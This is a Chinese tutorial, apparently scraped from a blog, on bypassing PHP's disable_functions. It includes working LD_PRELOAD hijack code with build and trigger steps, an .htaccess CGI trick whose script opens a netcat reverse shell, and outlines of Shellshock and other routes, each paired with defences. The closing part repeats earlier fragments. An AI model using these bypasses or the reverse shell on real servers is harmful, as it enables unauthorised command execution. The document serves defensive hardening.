PHP绕过disable_functions执行系统命令的几种方式<\/h1>

一、背景与概述<\/h2>
在PHP安全配置中，管理员通常会禁用一些危险函数（如eval、exec、system等），这些限制被称为"disable_functions"。然而，攻击者有多种方法可以绕过这些限制来执行系统命令。<\/p>

二、Bash漏洞利用(CVE-2014-6271)<\/h2>

原理<\/h3>
利用GNU Bash 4.3及之前版本中的环境变量远程命令执行漏洞，通过PHP的mail()函数触发。<\/p>

具体实现<\/h3>

PHP的mail()函数最后一个参数additional_parameters<\/code>可以传递附加命令<\/li>
当使用sendmail发送邮件时，会调用系统命令<\/li>

如果系统默认sh是bash且存在漏洞，可以执行任意命令<\/li>
<\/ol>
关键代码<\/h3>
if<\/span> (extra_cmd !=<\/span> NULL) {
<\/span><\/span>    spprintf(&<\/span>sendmail_cmd, 0<\/span>, "%s %s"<\/span>, sendmail_path, extra_cmd);
<\/span><\/span>} else<\/span> {
<\/span><\/span>    sendmail_cmd =<\/span> sendmail_path;
<\/span><\/span>}
<\/span><\/span>sendmail =<\/span> popen(sendmail_cmd, "w"<\/span>);
<\/span><\/span><\/code><\/pre>防御措施<\/h3>

修复CVE-2014-6271 Bash漏洞<\/li>
类似函数：imap_mail等也会调用popen<\/li>
<\/ul>
三、LD_PRELOAD环境变量利用<\/h2>
原理<\/h3>
Linux的LD_PRELOAD环境变量允许在程序运行前优先加载指定的动态链接库，可以劫持库函数调用。<\/p>
实现步骤<\/h3>

编写恶意动态库，覆盖目标函数（如geteuid）<\/li>
使用putenv设置LD_PRELOAD环境变量<\/li>
调用会触发目标函数的PHP函数（如mail）<\/li>
<\/ol>
示例代码<\/h3>
hack.c:<\/p>
#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> payload<\/span>() {
<\/span><\/span>    system("touch \/var\/www\/html\/test"<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> geteuid<\/span>() {
<\/span><\/span>    if<\/span>(getenv("LD_PRELOAD"<\/span>) ==<\/span> NULL) { return<\/span> 0<\/span>; }
<\/span><\/span>    unsetenv("LD_PRELOAD"<\/span>);
<\/span><\/span>    payload();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译命令:<\/p>
gcc -c -fPIC hack.c -o hack
<\/span><\/span>gcc -shared hack -o hack.so
<\/span><\/span><\/code><\/pre>PHP调用代码:<\/p>
<?<\/span>php<\/span>
<\/span><\/span>putenv<\/span>("LD_PRELOAD=\/var\/www\/html\/hack.so"<\/span>);
<\/span><\/span>mail<\/span>("adwin@localhost"<\/span>, ""<\/span>, ""<\/span>, ""<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>防御措施<\/h3>

禁用putenv函数<\/li>
限制环境变量的传递<\/li>
<\/ul>
四、.htaccess文件利用<\/h2>
前提条件<\/h3>

Apache环境<\/li>
mod_cgi已启用<\/li>
AllowOverride设置为All<\/li>
有权限写.htaccess文件<\/li>
<\/ol>
实现方法<\/h3>

修改.htaccess添加ExecCGI选项和处理器<\/li>
创建CGI脚本文件<\/li>
通过访问CGI脚本执行命令<\/li>
<\/ol>
示例.htaccess内容:<\/p>
Options +ExecCGI
AddHandler cgi-script .dizzle
<\/code><\/pre>
CGI脚本示例(shell.dizzle):<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>echo -ne "Content-Type: text\/html\n\n"<\/span>
<\/span><\/span>nc -c '\/bin\/bash'<\/span> 127.0.0.1 4444<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h3>

限制.htaccess文件修改权限<\/li>
禁用不必要的Apache模块<\/li>
<\/ul>
五、其他绕过方式<\/h2>
1. ImageMagick漏洞<\/h3>

影响版本: ImageMagick 6.9.3-9之前<\/li>
通过处理畸形图片触发命令注入<\/li>
<\/ul>
2. pcntl_exec<\/h3>

利用pcntl扩展执行命令<\/li>
常用于exec被禁用的情况<\/li>
<\/ul>
3. COM组件(Windows)<\/h3>

需要com.allow_dcom = true<\/li>
可以绕过安全模式限制<\/li>
<\/ul>
4. win32std扩展<\/h3>

使用win_shell_execute函数执行命令<\/li>
较老的PHP扩展<\/li>
<\/ul>
六、综合防御建议<\/h2>

及时修复已知漏洞(Bash漏洞等)<\/li>
限制危险函数(putenv等)的使用<\/li>
严格控制文件写入权限<\/li>
禁用不必要的服务和模块<\/li>
最小化PHP运行权限<\/li>
定期审查服务器配置<\/li>
监控异常行为<\/li>
<\/ol>
通过了解这些绕过技术，管理员可以更有针对性地加强服务器安全配置，防止攻击者利用这些方法提升权限或执行恶意操作。<\/p>

PHP绕过disable_functions执行系统命令的几种方式<\/h1>

一、背景与概述<\/h2> 在PHP安全配置中，管理员通常会禁用一些危险函数（如eval、exec、system等），这些限制被称为"disable_functions"。然而，攻击者有多种方法可以绕过这些限制来执行系统命令。<\/p>

二、Bash漏洞利用(CVE-2014-6271)<\/h2>

原理<\/h3> 利用GNU Bash 4.3及之前版本中的环境变量远程命令执行漏洞，通过PHP的mail()函数触发。<\/p>

三、LD_PRELOAD环境变量利用<\/h2>

原理<\/h3> Linux的LD_PRELOAD环境变量允许在程序运行前优先加载指定的动态链接库，可以劫持库函数调用。<\/p>

四、.htaccess文件利用<\/h2>

五、其他绕过方式<\/h2>

一、背景与概述<\/h2>
在PHP安全配置中，管理员通常会禁用一些危险函数（如eval、exec、system等），这些限制被称为"disable_functions"。然而，攻击者有多种方法可以绕过这些限制来执行系统命令。<\/p>

原理<\/h3>
利用GNU Bash 4.3及之前版本中的环境变量远程命令执行漏洞，通过PHP的mail()函数触发。<\/p>

原理<\/h3>
Linux的LD_PRELOAD环境变量允许在程序运行前优先加载指定的动态链接库，可以劫持库函数调用。<\/p>